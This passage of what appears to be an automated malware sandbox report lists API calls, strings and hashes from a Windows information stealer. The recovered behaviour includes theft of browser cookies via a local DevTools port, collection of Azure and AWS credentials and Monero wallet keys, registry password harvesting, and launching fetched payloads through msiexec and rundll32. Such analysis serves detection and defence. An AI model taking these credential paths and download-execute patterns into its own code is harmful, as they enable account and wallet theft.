                                    • Part of subcall function 00E6C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E6C97C
                                  • StrStrA.SHLWAPI(?,0173D580,00000000,?,00E81554,00000000,?,00000000,01738898), ref: 00E6CE5A
                                  • StrStrA.SHLWAPI(00000000,01738A98), ref: 00E6CE71
                                    • Part of subcall function 00E6C920: lstrcat.KERNEL32(?,00E80B47), ref: 00E6CA43
                                    • Part of subcall function 00E6C920: lstrcat.KERNEL32(?,00E80B4B), ref: 00E6CA57
                                    • Part of subcall function 00E6C920: lstrcat.KERNEL32(?,00E80B4E), ref: 00E6CA78
                                  • lstrlen.KERNEL32(00000000), ref: 00E6CF44
                                  • CloseHandle.KERNEL32(00000000), ref: 00E6CF9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 47ffb61d25e94babefba2e169c3b8d08b910c2a136dbcc8b6d8b0f8e8d931f8c
                                  • Instruction ID: d8ed2c62aae60509a519fc1bd9df543c492d08ae49cb4362f627e9cc6f9c8d7a
                                  • Opcode Fuzzy Hash: 47ffb61d25e94babefba2e169c3b8d08b910c2a136dbcc8b6d8b0f8e8d931f8c
                                  • Instruction Fuzzy Hash: 82E12371900108ABDB19EBA4DCA1FEEB7B9AF94300F1491B9F10A77195DF306A49CF61
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • RegOpenKeyExA.ADVAPI32(00000000,0173AE08,00000000,00020019,00000000,00E805BE), ref: 00E78534
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E785B6
                                  • wsprintfA.USER32 ref: 00E785E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E7860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E7861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E78629
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: 1e6b2eb9428239c98bb96a21072354a7d300579ad87a12c5615aa994f014cec5
                                  • Instruction ID: 8ef271b0e6671a7dc074ab53eb4434cbae91a3899938f74256c3296a9197e330
                                  • Opcode Fuzzy Hash: 1e6b2eb9428239c98bb96a21072354a7d300579ad87a12c5615aa994f014cec5
                                  • Instruction Fuzzy Hash: 5881EC71911118ABDB28DB54CD95FEEB7B8BB58700F14D2E9E10EA6184DF706B84CFA0
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E791FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: `d$`d$image/jpeg
                                  • API String ID: 2244384528-3402243820
                                  • Opcode ID: 4f6089eff119f950b16f313759cebd7090d27424bb2bf1995920546488ae4ef7
                                  • Instruction ID: 48522c9d036c5b224b1cd9409776a2b020d2ddcde7dacbae8d9a463d571a7126
                                  • Opcode Fuzzy Hash: 4f6089eff119f950b16f313759cebd7090d27424bb2bf1995920546488ae4ef7
                                  • Instruction Fuzzy Hash: 1371E0B5A10208ABDB14DFE4DC85FEEB7B9BF48700F108558F516A7289DB74E944CB60
                                  APIs
                                    • Part of subcall function 00E78F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E78F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E75000
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00E7501D
                                    • Part of subcall function 00E74B60: wsprintfA.USER32 ref: 00E74B7C
                                    • Part of subcall function 00E74B60: FindFirstFileA.KERNEL32(?,?), ref: 00E74B93
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E7508C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00E750A9
                                    • Part of subcall function 00E74B60: StrCmpCA.SHLWAPI(?,00E80FC4), ref: 00E74BC1
                                    • Part of subcall function 00E74B60: StrCmpCA.SHLWAPI(?,00E80FC8), ref: 00E74BD7
                                    • Part of subcall function 00E74B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00E74DCD
                                    • Part of subcall function 00E74B60: FindClose.KERNEL32(000000FF), ref: 00E74DE2
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E75118
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00E75135
                                    • Part of subcall function 00E74B60: wsprintfA.USER32 ref: 00E74C00
                                    • Part of subcall function 00E74B60: StrCmpCA.SHLWAPI(?,00E808D3), ref: 00E74C15
                                    • Part of subcall function 00E74B60: wsprintfA.USER32 ref: 00E74C32
                                    • Part of subcall function 00E74B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00E74C6E
                                    • Part of subcall function 00E74B60: lstrcat.KERNEL32(?,0173E3B8), ref: 00E74C9A
                                    • Part of subcall function 00E74B60: lstrcat.KERNEL32(?,00E80FE0), ref: 00E74CAC
                                    • Part of subcall function 00E74B60: lstrcat.KERNEL32(?,?), ref: 00E74CC0
                                    • Part of subcall function 00E74B60: lstrcat.KERNEL32(?,00E80FE4), ref: 00E74CD2
                                    • Part of subcall function 00E74B60: lstrcat.KERNEL32(?,?), ref: 00E74CE6
                                    • Part of subcall function 00E74B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00E74CFC
                                    • Part of subcall function 00E74B60: DeleteFileA.KERNEL32(?), ref: 00E74D81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: 635742e2e82ec5c0e6fe4ddde437119174a166cfca75f500f12b00135dc10731
                                  • Instruction ID: cf8023ea28498cac051c5bc014b58d10384578f6ccfb73ba6ea46dee7122d601
                                  • Opcode Fuzzy Hash: 635742e2e82ec5c0e6fe4ddde437119174a166cfca75f500f12b00135dc10731
                                  • Instruction Fuzzy Hash: 0141B3B6A8030867DB24F770EC47FDD73685B60700F4095A4B64D760C5EEB49BC88B92
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E73415
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E735AD
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E7373A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: aaeda9d7d8dde83f8cf29f61f9f97cec36ab057e16414ad11c930e2665a16397
                                  • Instruction ID: 1ccf1ec291bb8fe9090ccccadc62811534e16ac009e8036d397a1e153b77f1fa
                                  • Opcode Fuzzy Hash: aaeda9d7d8dde83f8cf29f61f9f97cec36ab057e16414ad11c930e2665a16397
                                  • Instruction Fuzzy Hash: 8C1223719101089ADB19FBA0DDA2FEEB7B9AF54300F1491A9F10E76195EF302B49CF51
                                  APIs
                                    • Part of subcall function 00E69A50: InternetOpenA.WININET(00E80AF6,00000001,00000000,00000000,00000000), ref: 00E69A6A
                                  • lstrcat.KERNEL32(?,cookies), ref: 00E69CAF
                                  • lstrcat.KERNEL32(?,00E812C4), ref: 00E69CC1
                                  • lstrcat.KERNEL32(?,?), ref: 00E69CD5
                                  • lstrcat.KERNEL32(?,00E812C8), ref: 00E69CE7
                                  • lstrcat.KERNEL32(?,?), ref: 00E69CFB
                                  • lstrcat.KERNEL32(?,.txt), ref: 00E69D0D
                                  • lstrlen.KERNEL32(00000000), ref: 00E69D17
                                  • lstrlen.KERNEL32(00000000), ref: 00E69D26
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 3174675846-3542011879
                                  • Opcode ID: 7eb130092bc633c99a6a7abcf5b354f40fafe020c2eea760cc4865e725604c26
                                  • Instruction ID: 3d49d90c1143f84cdae114e81a777f2e0bd0af393485eee5ee445406b8b5a841
                                  • Opcode Fuzzy Hash: 7eb130092bc633c99a6a7abcf5b354f40fafe020c2eea760cc4865e725604c26
                                  • Instruction Fuzzy Hash: E4516FB1840608ABDB14EBE0EC95FEE737CAB04301F405698F21AB7095EB305A49CF61
                                  APIs
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E662D0: InternetOpenA.WININET(00E80DFF,00000001,00000000,00000000,00000000), ref: 00E66331
                                    • Part of subcall function 00E662D0: StrCmpCA.SHLWAPI(?,0173E308), ref: 00E66353
                                    • Part of subcall function 00E662D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E66385
                                    • Part of subcall function 00E662D0: HttpOpenRequestA.WININET(00000000,GET,?,0173DAB0,00000000,00000000,00400100,00000000), ref: 00E663D5
                                    • Part of subcall function 00E662D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E6640F
                                    • Part of subcall function 00E662D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E66421
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E75568
                                  • lstrlen.KERNEL32(00000000), ref: 00E7557F
                                    • Part of subcall function 00E78FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E78FE2
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00E755B4
                                  • lstrlen.KERNEL32(00000000), ref: 00E755D3
                                  • lstrlen.KERNEL32(00000000), ref: 00E755FE
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: 06c3928795d695ac642ed23fd263584203c064c1068396a4bb273656d4500580
                                  • Instruction ID: 9d2feac912b00199ae8b2cdc6293dd92ffae8e7b005e79c17f45500bbea62ef3
                                  • Opcode Fuzzy Hash: 06c3928795d695ac642ed23fd263584203c064c1068396a4bb273656d4500580
                                  • Instruction Fuzzy Hash: 2E510A719101089BCB18FF60CDA6AED77B9AF90340F54A468E50E7B592EB306B45CB62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 82abd4dde4591a0c0e8e24ee88ef2ecb197dae34bf7fe76013ef387337e1e6d0
                                  • Instruction ID: 7a54993b692aa2ee3d08dc04d62bb8a2cd3f128a10fc4eddc4a37259cd5616ef
                                  • Opcode Fuzzy Hash: 82abd4dde4591a0c0e8e24ee88ef2ecb197dae34bf7fe76013ef387337e1e6d0
                                  • Instruction Fuzzy Hash: E5C195B5900219ABCB28EF60DC99FDE73B9AF94304F0495A8E50D77185DB30AA85CF91
                                  APIs
                                    • Part of subcall function 00E78F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E78F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E7453C
                                  • lstrcat.KERNEL32(?,0173DE58), ref: 00E7455B
                                  • lstrcat.KERNEL32(?,?), ref: 00E7456F
                                  • lstrcat.KERNEL32(?,0173C998), ref: 00E74583
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E78F20: GetFileAttributesA.KERNEL32(00000000,?,00E61B94,?,?,00E8577C,?,?,00E80E22), ref: 00E78F2F
                                    • Part of subcall function 00E6A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E6A489
                                    • Part of subcall function 00E6A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E6A13C
                                    • Part of subcall function 00E6A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E6A161
                                    • Part of subcall function 00E6A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E6A181
                                    • Part of subcall function 00E6A110: ReadFile.KERNEL32(000000FF,?,00000000,00E6148F,00000000), ref: 00E6A1AA
                                    • Part of subcall function 00E6A110: LocalFree.KERNEL32(00E6148F), ref: 00E6A1E0
                                    • Part of subcall function 00E6A110: CloseHandle.KERNEL32(000000FF), ref: 00E6A1EA
                                    • Part of subcall function 00E79550: GlobalAlloc.KERNEL32(00000000,-F,00E7462D), ref: 00E79563
                                  • StrStrA.SHLWAPI(?,0173DED0), ref: 00E74643
                                  • GlobalFree.KERNEL32(?), ref: 00E74762
                                    • Part of subcall function 00E6A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E6A23F
                                    • Part of subcall function 00E6A210: LocalAlloc.KERNEL32(00000040,?,?,?,00E64F3E,00000000,?), ref: 00E6A251
                                    • Part of subcall function 00E6A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E6A27A
                                    • Part of subcall function 00E6A210: LocalFree.KERNEL32(?,?,?,?,00E64F3E,00000000,?), ref: 00E6A28F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E746F3
                                  • StrCmpCA.SHLWAPI(?,00E808D2), ref: 00E74710
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00E74722
                                  • lstrcat.KERNEL32(00000000,?), ref: 00E74735
                                  • lstrcat.KERNEL32(00000000,00E80FA0), ref: 00E74744
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: e32fd7ff4be2faba99bedcb9b852ee109124e5c75e8f60b632b58213a47bb135
                                  • Instruction ID: a1ad97589af3dc6a4c31ae044f1b9daa7ac9eb608f02a68ff9c7df7868e84a85
                                  • Opcode Fuzzy Hash: e32fd7ff4be2faba99bedcb9b852ee109124e5c75e8f60b632b58213a47bb135
                                  • Instruction Fuzzy Hash: 3A7159B6900208ABDB18EBB0DD59FDD73B9AB88300F0495A8F619B7185EB34DB44CF51
                                  APIs
                                    • Part of subcall function 00E612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E612B4
                                    • Part of subcall function 00E612A0: RtlAllocateHeap.NTDLL(00000000), ref: 00E612BB
                                    • Part of subcall function 00E612A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E612D7
                                    • Part of subcall function 00E612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E612F5
                                    • Part of subcall function 00E612A0: RegCloseKey.ADVAPI32(?), ref: 00E612FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E6134F
                                  • lstrlen.KERNEL32(?), ref: 00E6135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00E61377
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E78CF0: GetSystemTime.KERNEL32(00E80E1B,0173A010,00E805B6,?,?,00E613F9,?,0000001A,00E80E1B,00000000,?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E78D16
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00E61465
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E6A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E6A13C
                                    • Part of subcall function 00E6A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E6A161
                                    • Part of subcall function 00E6A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E6A181
                                    • Part of subcall function 00E6A110: ReadFile.KERNEL32(000000FF,?,00000000,00E6148F,00000000), ref: 00E6A1AA
                                    • Part of subcall function 00E6A110: LocalFree.KERNEL32(00E6148F), ref: 00E6A1E0
                                    • Part of subcall function 00E6A110: CloseHandle.KERNEL32(000000FF), ref: 00E6A1EA
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E614EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: 02d231d1b4ca922dd5641e2c8841c125fe7ed00d068466d1c6ab03aa6568cd38
                                  • Instruction ID: fdd8ff10e061e348fdd241bbdf31f07d4c0154edaa6798d4cb05ce279bfe4088
                                  • Opcode Fuzzy Hash: 02d231d1b4ca922dd5641e2c8841c125fe7ed00d068466d1c6ab03aa6568cd38
                                  • Instruction Fuzzy Hash: 5F5123B295011957CB25FB60DD92FED73BC9B54300F4495F8B60E72092EE305B89CB66
                                  APIs
                                  • InternetOpenA.WININET(00E80AF6,00000001,00000000,00000000,00000000), ref: 00E69A6A
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00E69AAB
                                  • InternetCloseHandle.WININET(00000000), ref: 00E69AC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$Open$CloseHandle
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 3289985339-2144369209
                                  • Opcode ID: 4d26d20a8ec97cbec0917ee4c4031dd851f8e9a63f8bbacdac2781551d89df68
                                  • Instruction ID: f6146a920e9718d4e6471333ddf4a095a4cf8e7af7bd95ee069bd97df3068216
                                  • Opcode Fuzzy Hash: 4d26d20a8ec97cbec0917ee4c4031dd851f8e9a63f8bbacdac2781551d89df68
                                  • Instruction Fuzzy Hash: 1B415B75A50208EBDB24EFA0DC85FDD77B8AB48780F105198F50DBB190DBB0AE84CB60
                                  APIs
                                    • Part of subcall function 00E67330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E6739A
                                    • Part of subcall function 00E67330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E67411
                                    • Part of subcall function 00E67330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E6746D
                                    • Part of subcall function 00E67330: GetProcessHeap.KERNEL32(00000000,?), ref: 00E674B2
                                    • Part of subcall function 00E67330: HeapFree.KERNEL32(00000000), ref: 00E674B9
                                  • lstrcat.KERNEL32(00000000,00E8192C), ref: 00E67666
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00E676A8
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00E676BA
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00E676EF
                                  • lstrcat.KERNEL32(00000000,00E81934), ref: 00E67700
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00E67733
                                  • lstrcat.KERNEL32(00000000,00E81938), ref: 00E6774D
                                  • task.LIBCPMTD ref: 00E6775B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
